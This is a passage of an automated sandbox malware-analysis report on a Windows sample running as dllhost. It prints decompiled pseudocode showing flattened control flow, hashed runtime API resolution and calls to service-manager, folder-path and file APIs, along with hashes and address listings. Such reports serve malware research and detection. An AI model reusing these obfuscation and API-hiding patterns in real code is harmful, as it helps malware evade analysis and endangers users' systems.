						 *0x48df30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x48df88;
						if(_t33 == 0) {
							_t33 = E00483E60(_t56, E00483F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x48df88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x004838fa
                                                                                0x004838fc
                                                                                0x004838fe
                                                                                0x00483902
                                                                                0x00483907
                                                                                0x00483910
                                                                                0x00483910
                                                                                0x00483910
                                                                                0x00483915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0048391b
                                                                                0x00483a5f
                                                                                0x00000000
                                                                                0x00483921
                                                                                0x00483926
                                                                                0x00483a1e
                                                                                0x00483a36
                                                                                0x00483a36
                                                                                0x00483a48
                                                                                0x00483a4a
                                                                                0x00483a4f
                                                                                0x00483ba1
                                                                                0x00483a55
                                                                                0x00483a55
                                                                                0x00000000
                                                                                0x00483a55
                                                                                0x0048392c
                                                                                0x00483931
                                                                                0x00483b70
                                                                                0x00483b77
                                                                                0x00483b8a
                                                                                0x00483b8f
                                                                                0x00483b8f
                                                                                0x00000000
                                                                                0x00483b95
                                                                                0x0048393c
                                                                                0x00483ab6
                                                                                0x00483abb
                                                                                0x00000000
                                                                                0x00483acb
                                                                                0x00483acb
                                                                                0x00483acb
                                                                                0x00483942
                                                                                0x00483947
                                                                                0x004839fd
                                                                                0x00483a06
                                                                                0x00483a0d
                                                                                0x0048394d
                                                                                0x00483953
                                                                                0x00483974
                                                                                0x00483976
                                                                                0x00000000
                                                                                0x00483978
                                                                                0x00483982
                                                                                0x00483984
                                                                                0x0048398b
                                                                                0x0048399e
                                                                                0x004839a3
                                                                                0x004839a3
                                                                                0x004839bc
                                                                                0x004839d8
                                                                                0x004839dd
                                                                                0x004839e2
                                                                                0x004839e7
                                                                                0x004839e7
                                                                                0x00483955
                                                                                0x00483955
                                                                                0x0048395d
                                                                                0x0048396d
                                                                                0x0048396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0048395d
                                                                                0x00483953
                                                                                0x00000000
                                                                                0x00483947
                                                                                0x0048393c
                                                                                0x00483926
                                                                                0x00000000
                                                                                0x0048391b
                                                                                0x00483a6e
                                                                                0x00483ad6
                                                                                0x00483ad8
                                                                                0x00483adf
                                                                                0x00483af2
                                                                                0x00483af7
                                                                                0x00483af7
                                                                                0x00483b0b
                                                                                0x00483b0d
                                                                                0x00483b12
                                                                                0x00483b17
                                                                                0x00483b2a
                                                                                0x00483b2f
                                                                                0x00483b2f
                                                                                0x00483b36
                                                                                0x00483b38
                                                                                0x00483b3f
                                                                                0x00483b52
                                                                                0x00483b57
                                                                                0x00483b57
                                                                                0x00483b60
                                                                                0x00483b62
                                                                                0x00483b66
                                                                                0x00000000
                                                                                0x00483a70
                                                                                0x00483a75
                                                                                0x00000000
                                                                                0x00483a77
                                                                                0x00483a77
                                                                                0x00483a7e
                                                                                0x00483a91
                                                                                0x00483a96
                                                                                0x00483a96
                                                                                0x00483aa1
                                                                                0x00483aa5
                                                                                0x00483aac
                                                                                0x00000000
                                                                                0x00483aac
                                                                                0x00483a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00483A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: 9f31964077c32ff6bb45019578e10f446928c9debf0577bf0e453aa512fd8d94
                                                                                • Instruction ID: 529158c8867a9ebc7e21cc315085d24542ab490d415ea6f637f1ce30c16f0e82
                                                                                • Opcode Fuzzy Hash: 9f31964077c32ff6bb45019578e10f446928c9debf0577bf0e453aa512fd8d94
                                                                                • Instruction Fuzzy Hash: 0E51E3B170420147CA24BFA9D855A7F3696AB90F0AF000D2FF655C7392EA7DCF05839A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00485040, Relevance: 1.7, APIs: 1, Instructions: 248memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E00485040(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v36;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t58;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t116;

				_t101 = _v12;
				_t58 = 0;
				_v16 = __edx;
				_t112 = 0;
				_v20 = __ecx;
				_t104 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t115 = _t104 - 0x12f72f95;
						if(_t115 <= 0) {
							break;
						}
						__eflags = _t104 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t104 - 0x2fab56c4;
							if(_t104 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x48e494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E00483E60(_t58, E00483F00(0x9bab0b12), 0x7facde30, _t112);
									 *0x48e494 = _t17;
								}
								_t105 =  *_t17();
								__eflags =  *0x48dd18;
								if( *0x48dd18 == 0) {
									 *0x48dd18 = E00483E60(_t58, E00483F00(0x9bab0b12), 0x9ff0609c, _t112);
								}
								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
								_t58 = _t16;
								__eflags = _t58;
								if(_t58 != 0) {
									_t104 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x48e484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E00483E60(_t58, E00483F00(0x26f5757c), 0x9e91db81, _t112);
									 *0x48e484 = _t23;
								}
								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x48e18c;
								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E00483E60(_t58, E00483F00(0x26f5757c), 0x268fe5f0, _t112);
									 *0x48e18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t104 - 0x1ca940c1;
								if(_t104 == 0x1ca940c1) {
									_t104 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t104 - 0x254bd927;
									if(_t104 != 0x254bd927) {
										L40:
										__eflags = _t104 - 0x1f0f293e;
										if(_t104 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t50 =  *0x48e29c;
										__eflags = _t50;
										if(_t50 == 0) {
											_t50 = E00483E60(_t58, E00483F00(0x26f5757c), 0x4574c66, _t112);
											 *0x48e29c = _t50;
										}
										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t51;
										if(_t51 == 0) {
											L13:
											_t104 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t52 =  *0x48de08;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E00483E60(_t58, E00483F00(0x9bab0b12), 0xd8ef4c49, _t112);
												 *0x48de08 = _t52;
											}
											_t53 =  *_t52();
											_t104 = 0x128dff18;
											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
											_t16 = _t58 + _v52 * 0x2c;
											__eflags = _t103 - _t16;
											_v68 = _t16;
											_t101 =  >=  ? _t58 : _t103;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t115 == 0) {
						_t29 =  *0x48e494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E00483E60(_t58, E00483F00(0x9bab0b12), 0x7facde30, _t112);
							 *0x48e494 = _t29;
						}
						_t107 =  *_t29();
						_t31 =  *0x48df30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E00483E60(_t58, E00483F00(0x9bab0b12), 0x5010a54d, _t112);
							 *0x48df30 = _t31;
						}
						return  *_t31(_t107, 0, _t58);
					}
					_t116 = _t104 - 0x10f7fbef;
					if(_t116 > 0) {
						__eflags = _t104 - 0x11e09e52;
						if(_t104 == 0x11e09e52) {
							_t35 =  *0x48e494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E00483E60(_t58, E00483F00(0x9bab0b12), 0x7facde30, _t112);
								 *0x48e494 = _t35;
							}
							_t108 =  *_t35();
							_t37 =  *0x48df30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E00483E60(_t58, E00483F00(0x9bab0b12), 0x5010a54d, _t112);
								 *0x48df30 = _t37;
							}
							 *_t37(_t108, 0, _t112);
							_t104 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t104 - 0x128dff18;
							if(_t104 != 0x128dff18) {
								goto L40;
							} else {
								_t41 =  *0x48e270;
								__eflags = _t41;
								if(_t41 == 0) {
									_t41 = E00483E60(_t58, E00483F00(0x26f5757c), 0x56e230f9, _t112);
									 *0x48e270 = _t41;
								}
								_t42 =  *_t41(_v20,  *_t101, 1);
								__eflags = _t42;
								_v36 = _t42;
								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t116 == 0) {
							_t45 =  *0x48e200;
							__eflags = _t45;
							if(_t45 == 0) {
								_t45 = E00483E60(_t58, E00483F00(0x26f5757c), 0x16d40839, _t112);
								 *0x48e200 = _t45;
							}
							 *_t45(_v16, 1, _t112);
							goto L13;
						} else {
							if(_t104 == 0x5d498c4) {
								_t101 = _t101 + 0x2c;
								__eflags = _t101 - _t16;
								asm("sbb esi, esi");
								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t104 != 0x8956eec) {
									goto L40;
								} else {
									_t112 = E004842C0(_t58, 0x2000);
									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}









































                                                                                0x00485047
                                                                                0x0048504b
                                                                                0x0048504d
                                                                                0x00485051
                                                                                0x00485053
                                                                                0x00485057
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x00485060
                                                                                0x00485060
                                                                                0x00485060
                                                                                0x00485066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004851af
                                                                                0x004851b5
                                                                                0x004852f9
                                                                                0x004852ff
                                                                                0x00000000
                                                                                0x00485301
                                                                                0x00485301
                                                                                0x00485306
                                                                                0x00485308
                                                                                0x0048531b
                                                                                0x00485320
                                                                                0x00485320
                                                                                0x00485327
                                                                                0x0048532e
                                                                                0x00485330
                                                                                0x00485348
                                                                                0x00485348
                                                                                0x00485355
                                                                                0x00485357
                                                                                0x00485359
                                                                                0x0048535b
                                                                                0x0048535d
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x00000000
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x0048535b
                                                                                0x004851bb
                                                                                0x004851bb
                                                                                0x00485277
                                                                                0x0048527c
                                                                                0x0048527e
                                                                                0x00485291
                                                                                0x00485296
                                                                                0x00485296
                                                                                0x004852ac
                                                                                0x004852b0
                                                                                0x004852b2
                                                                                0x004852bd
                                                                                0x004852c3
                                                                                0x004852c5
                                                                                0x004852d8
                                                                                0x004852dd
                                                                                0x004852dd
                                                                                0x004852e6
                                                                                0x00000000
                                                                                0x004851c1
                                                                                0x004851c1
                                                                                0x004851c7
                                                                                0x0048526d
                                                                                0x00000000
                                                                                0x004851cd
                                                                                0x004851cd
                                                                                0x004851d3
                                                                                0x004852e8
                                                                                0x004852e8
                                                                                0x004852ee
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x00000000
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x004851d9
                                                                                0x004851d9
                                                                                0x004851de
                                                                                0x004851e0
                                                                                0x004851f3
                                                                                0x004851f8
                                                                                0x004851f8
                                                                                0x0048521b
                                                                                0x0048521d
                                                                                0x0048521f
                                                                                0x004850ef
                                                                                0x004850ef
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x00000000
                                                                                0x0048505c
                                                                                0x00485225
                                                                                0x00485225
                                                                                0x0048522a
                                                                                0x0048522c
                                                                                0x0048523f
                                                                                0x00485244
                                                                                0x00485244
                                                                                0x00485249
                                                                                0x0048524e
                                                                                0x0048525b
                                                                                0x0048525d
                                                                                0x0048525f
                                                                                0x00485261
                                                                                0x00485265
                                                                                0x00000000
                                                                                0x00485265
                                                                                0x00000000
                                                                                0x0048521f
                                                                                0x004851d3
                                                                                0x004851c7
                                                                                0x004851bb
                                                                                0x004853c0
                                                                                0x004853c0
                                                                                0x00000000
                                                                                0x004853c0
                                                                                0x0048506c
                                                                                0x00485367
                                                                                0x0048536c
                                                                                0x0048536e
                                                                                0x00485381
                                                                                0x00485386
                                                                                0x00485386
                                                                                0x0048538d
                                                                                0x0048538f
                                                                                0x00485394
                                                                                0x00485396
                                                                                0x004853a9
                                                                                0x004853ae
                                                                                0x004853ae
                                                                                0x00000000
                                                                                0x004853b7
                                                                                0x00485072
                                                                                0x00485078
                                                                                0x004850f9
                                                                                0x004850ff
                                                                                0x00485153
                                                                                0x00485158
                                                                                0x0048515a
                                                                                0x0048516d
                                                                                0x00485172
                                                                                0x00485172
                                                                                0x00485179
                                                                                0x0048517b
                                                                                0x00485180
                                                                                0x00485182
                                                                                0x00485195
                                                                                0x0048519a
                                                                                0x0048519a
                                                                                0x004851a3
                                                                                0x004851a5
                                                                                0x00000000
                                                                                0x00485101
                                                                                0x00485101
                                                                                0x00485107
                                                                                0x00000000
                                                                                0x0048510d
                                                                                0x0048510d
                                                                                0x00485112
                                                                                0x00485114
                                                                                0x00485127
                                                                                0x0048512c
                                                                                0x0048512c
                                                                                0x00485139
                                                                                0x0048513b
                                                                                0x0048513d
                                                                                0x0048514b
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x00000000
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x00485107
                                                                                0x0048507a
                                                                                0x0048507a
                                                                                0x004850c2
                                                                                0x004850c7
                                                                                0x004850c9
                                                                                0x004850dc
                                                                                0x004850e1
                                                                                0x004850e1
                                                                                0x004850ed
                                                                                0x00000000
                                                                                0x0048507c
                                                                                0x00485082
                                                                                0x004850ad
                                                                                0x004850b0
                                                                                0x004850b2
                                                                                0x004850ba
                                                                                0x00000000
                                                                                0x00485084
                                                                                0x0048508a
                                                                                0x00000000
                                                                                0x00485090
                                                                                0x0048509a
                                                                                0x004850a8
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x00000000
                                                                                0x0048505c
                                                                                0x0048505c
                                                                                0x0048508a
                                                                                0x00485082
                                                                                0x0048507a
                                                                                0x00000000
                                                                                0x00485078

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,00488AC8,?,3251FEFE,?,?), ref: 00485355
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 5941c8ada95b880c0482d85773a4854ff1ad80bdad2217c82c0327b9e37072be
                                                                                • Instruction ID: 1665978b1af70121c3691397f0100352e65a44a0b5de51f21aaf70970c6a5810
                                                                                • Opcode Fuzzy Hash: 5941c8ada95b880c0482d85773a4854ff1ad80bdad2217c82c0327b9e37072be
                                                                                • Instruction Fuzzy Hash: 2681C531F047115BDB14BF7A9C9572F26DAAB90B44F510C2FFA55EB391EA288D004BCA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00489860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 73%
                                                                                			E00489860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x48e310;
							if( *0x48e310 == 0) {
								 *0x48e310 = E00483E60(_t64, E00483F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x48e54c; // 0x50dff0
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x48dbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E00483E60(_t64, E00483F00(0xd9518805), 0x141622d6, _t94);
										 *0x48dbd8 = _t69;
									}
									_t53 =  *0x48e54c; // 0x50dff0
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E00487C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x48e3f4;
											if(_t60 == 0) {
												_t60 = E00483E60(_t64, E00483F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x48e3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E00483D00( &_v536);
											_t72 =  *0x48e54c; // 0x50dff0
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x48dbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E00483E60(_t64, E00483F00(0xd9518805), 0x141622d6, _t94);
								 *0x48dbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x48e54c; // 0x50dff0
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E00483040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x48e494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E00483E60(_t64, E00483F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x48e494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x48dd18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E00483E60(_t64, E00483F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x48dd18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x48e54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E00487E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x48e18c;
								if( *0x48e18c == 0) {
									 *0x48e18c = E00483E60(_t64, E00483F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x48e54c; // 0x50dff0
									 *((intOrPtr*)(_t47 + 8)) = 0x487e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x00489868
                                                                                0x0048986a
                                                                                0x00489871
                                                                                0x00489875
                                                                                0x00489875
                                                                                0x00489878
                                                                                0x00489880
                                                                                0x00489880
                                                                                0x00489880
                                                                                0x00489880
                                                                                0x00489885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0048988b
                                                                                0x00489993
                                                                                0x00489995
                                                                                0x004899ad
                                                                                0x004899ad
                                                                                0x004899bb
                                                                                0x004899bd
                                                                                0x004899bf
                                                                                0x004899c1
                                                                                0x004899d8
                                                                                0x004899c3
                                                                                0x004899c3
                                                                                0x004899c8
                                                                                0x004899ce
                                                                                0x004899ce
                                                                                0x00000000
                                                                                0x00489891
                                                                                0x00489891
                                                                                0x00489896
                                                                                0x00489936
                                                                                0x0048993b
                                                                                0x00000000
                                                                                0x00489941
                                                                                0x00489941
                                                                                0x00489947
                                                                                0x00489949
                                                                                0x00489961
                                                                                0x00489963
                                                                                0x00489963
                                                                                0x00489969
                                                                                0x0048997d
                                                                                0x0048997f
                                                                                0x00489981
                                                                                0x00489986
                                                                                0x00000000
                                                                                0x00489986
                                                                                0x0048989c
                                                                                0x0048989c
                                                                                0x00489927
                                                                                0x0048992c
                                                                                0x00000000
                                                                                0x004898a2
                                                                                0x004898a7
                                                                                0x00489905
                                                                                0x0048990d
                                                                                0x00489912
                                                                                0x0048991a
                                                                                0x00000000
                                                                                0x004898a9
                                                                                0x004898ae
                                                                                0x00000000
                                                                                0x004898b4
                                                                                0x004898b4
                                                                                0x004898bb
                                                                                0x004898ce
                                                                                0x004898d3
                                                                                0x004898d3
                                                                                0x004898e4
                                                                                0x004898ea
                                                                                0x004898ef
                                                                                0x004898f5
                                                                                0x004898fb
                                                                                0x00000000
                                                                                0x004898fb
                                                                                0x004898ae
                                                                                0x004898a7
                                                                                0x0048989c
                                                                                0x00489896
                                                                                0x00000000
                                                                                0x0048988b
                                                                                0x004899e2
                                                                                0x004899e7
                                                                                0x00489ae3
                                                                                0x00489ae8
                                                                                0x00489b02
                                                                                0x00489b07
                                                                                0x00489b09
                                                                                0x00489b1c
                                                                                0x00489b21
                                                                                0x00489b21
                                                                                0x00489b33
                                                                                0x00489b35
                                                                                0x00489b3e
                                                                                0x00489b3e
                                                                                0x00489b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004899ed
                                                                                0x004899ed
                                                                                0x00489a73
                                                                                0x00489a78
                                                                                0x00489a7a
                                                                                0x00489a8d
                                                                                0x00489a92
                                                                                0x00489a92
                                                                                0x00489a99
                                                                                0x00489a9b
                                                                                0x00489aa0
                                                                                0x00489aa2
                                                                                0x00489ab5
                                                                                0x00489aba
                                                                                0x00489aba
                                                                                0x00489ac7
                                                                                0x00489ac9
                                                                                0x00489ace
                                                                                0x00489ad0
                                                                                0x00489b4f
                                                                                0x00489b58
                                                                                0x00489ad2
                                                                                0x00489ad2
                                                                                0x00489ad9
                                                                                0x00000000
                                                                                0x00489ad9
                                                                                0x004899f3
                                                                                0x004899f3
                                                                                0x004899f8
                                                                                0x00489a47
                                                                                0x00489a49
                                                                                0x00489a61
                                                                                0x00489a61
                                                                                0x00489a67
                                                                                0x00489a69
                                                                                0x00000000
                                                                                0x004899fa
                                                                                0x004899fa
                                                                                0x004899ff
                                                                                0x00000000
                                                                                0x00489a05
                                                                                0x00489a05
                                                                                0x00489a0d
                                                                                0x00489a12
                                                                                0x00489a17
                                                                                0x00489a1f
                                                                                0x00489a24
                                                                                0x00489a2c
                                                                                0x00489a31
                                                                                0x00489a38
                                                                                0x00000000
                                                                                0x00489a38
                                                                                0x004899ff
                                                                                0x004899f8
                                                                                0x004899ed
                                                                                0x00000000
                                                                                0x00489aea
                                                                                0x00489aea
                                                                                0x00489aea
                                                                                0x00489b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0050DFD8), ref: 0048997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 004899BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 00489A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 00489B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$Y4[0
                                                                                • API String ID: 2382770032-4131004879
                                                                                • Opcode ID: 1c28efd76755ec73549aabe951847f62883a5d0dad7f67930b4091577e84b1c8
                                                                                • Instruction ID: cfa66bbbd72260fdad5381044d96bcb5c07835bd81d1921ea5a11627232b61ef
                                                                                • Opcode Fuzzy Hash: 1c28efd76755ec73549aabe951847f62883a5d0dad7f67930b4091577e84b1c8
                                                                                • Instruction Fuzzy Hash: 5361D270B046015BDB18BF69989573F3295EB90B08F180C2FF606DB391EA38DD05979E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00488400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 105 488400-4884df 106 4884e3-4884e9 105->106 107 4885c8-4885ce 106->107 108 4884ef 106->108 109 488630-488637 107->109 110 4885d0-4885d6 107->110 111 48866c-4886b4 call 48b6e0 108->111 112 4884f5-4884fb 108->112 113 488639-48864f call 483f00 call 483e60 109->113 114 488654-488667 109->114 115 4885d8-4885e0 110->115 116 4885b1-4885b7 110->116 121 4885bd-4885c7 111->121 135 4886ba 111->135 117 48854a-488551 112->117 118 4884fd-488503 112->118 113->114 114->106 124 488600-488624 CreateFileW 115->124 125 4885e2-4885fa call 483f00 call 483e60 115->125 116->106 116->121 122 48856e-488591 117->122 123 488553-488569 call 483f00 call 483e60 117->123 126 488543-488548 118->126 127 488505-48850b 118->127 148 4885ae 122->148 149 488593-4885a9 call 483f00 call 483e60 122->149 123->122 124->121 129 488626-48862b 124->129 125->124 126->106 127->116 134 488511-488518 127->134 129->106 139 48851a-488530 call 483f00 call 483e60 134->139 140 488535-488541 134->140 142 4886bc-4886be 135->142 143 4886c4-4886d1 135->143 139->140 140->106 142->121 142->143 148->116 149->148
                                                                                C-Code - Quality: 66%
                                                                                			E00488400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
